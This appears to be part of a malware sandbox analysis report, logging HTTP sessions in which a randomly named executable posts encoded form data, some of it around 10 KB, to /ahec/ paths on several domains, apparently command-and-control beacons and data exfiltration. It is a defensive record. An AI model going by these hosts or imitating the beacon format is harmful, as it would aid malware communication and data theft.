                                                                                                                                                            Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49765 | 34.117.26.57 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:03.659353971 CET | 735 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUhkXNuiBdSbEDz2zLKw==
Dec 8, 2023 14:52:03.983591080 CET | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:03 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
Dec 8, 2023 14:52:03.986537933 CET | 157 | IN
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49766 | 34.117.26.57 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:06.312115908 CET | 755 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYf1SdlUz7bb01TLnhcI=
Dec 8, 2023 14:52:06.637350082 CET | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:06 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
Dec 8, 2023 14:52:06.637448072 CET | 157 | IN
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49767 | 34.117.26.57 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:08.967581987 CET | 10837 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:09.291145086 CET | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:09 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
Dec 8, 2023 14:52:09.294420958 CET | 157 | IN
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49768 | 34.117.26.57 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:11.624073982 CET | 468 | OUT | GET /ahec/?XveXHZvx=UYUxSke5jkUMcYDNvZduqvCoEnfAlB/5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3pueYDpzLDOPRePOaEw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:11.947863102 CET | 300 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:11 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5208
                                                                                                                                                            Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: "65267254-1458"
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
Dec 8, 2023 14:52:11.961240053 CET | 1286 | IN
                                                                                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Dec 8, 2023 14:52:11.961343050 CET | 1286 | IN
                                                                                                                                                            Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
Dec 8, 2023 14:52:11.961360931 CET | 1286 | IN
                                                                                                                                                            Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
Dec 8, 2023 14:52:11.961412907 CET | 1286 | IN
                                                                                                                                                            Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
Dec 8, 2023 14:52:11.961487055 CET | 64 | IN
                                                                                                                                                            Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49769 | 81.169.145.70 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:17.612606049 CET | 744 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT3tGTatbCoXLzMuplNw==
Dec 8, 2023 14:52:17.869066000 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:17 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49770 | 81.169.145.70 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:20.392215014 CET | 764 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtfqVx+fpL4fshSvpstM=
Dec 8, 2023 14:52:20.649234056 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:20 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49771 | 81.169.145.70 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:23.174957037 CET | 10846 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:23.430182934 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:23 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49772 | 81.169.145.70 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:25.956589937 CET | 471 | OUT | GET /ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:26.210994959 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:26 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49773 | 85.159.66.93 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:32.217535973 CET | 744 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMB/XY8rX3GBqyeR04Gg==
                                                                                                                                                            Dec 8, 2023 14:52:32.558415890 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:32 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            34 | 192.168.2.4 | 49774 | 85.159.66.93 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:52:35.026890993 CET | 764 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uMQ4E9uEIW2RxuC8mGg=
                                                                                                                                                            Dec 8, 2023 14:52:35.367470026 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:35 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 18
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            35 | 192.168.2.4 | 49775 | 85.159.66.93 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:52:37.823259115 CET | 10846 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:38.162178040 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:38 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:43.0141623Z


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            36 | 192.168.2.4 | 49776 | 85.159.66.93 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:52:40.619764090 CET | 471 | OUT | GET /ahec/?XveXHZvx=AHFK2pjoxw5zzLKkvof1eZxXaE20EUKFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMnDP8n7IChKCrxhg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:40.898921013 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:40 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:45.7508499Z


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            37 | 192.168.2.4 | 49777 | 162.241.252.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:52:47.184953928 CET | 762 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpJa71laLZczE9HjYj2Q==
                                                                                                                                                            Dec 8, 2023 14:52:47.394695997 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:47 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            38 | 192.168.2.4 | 49778 | 162.241.252.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:52:49.898237944 CET | 782 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5fFbumDwyYBMDTHkfIw=
                                                                                                                                                            Dec 8, 2023 14:52:50.103866100 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:49 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
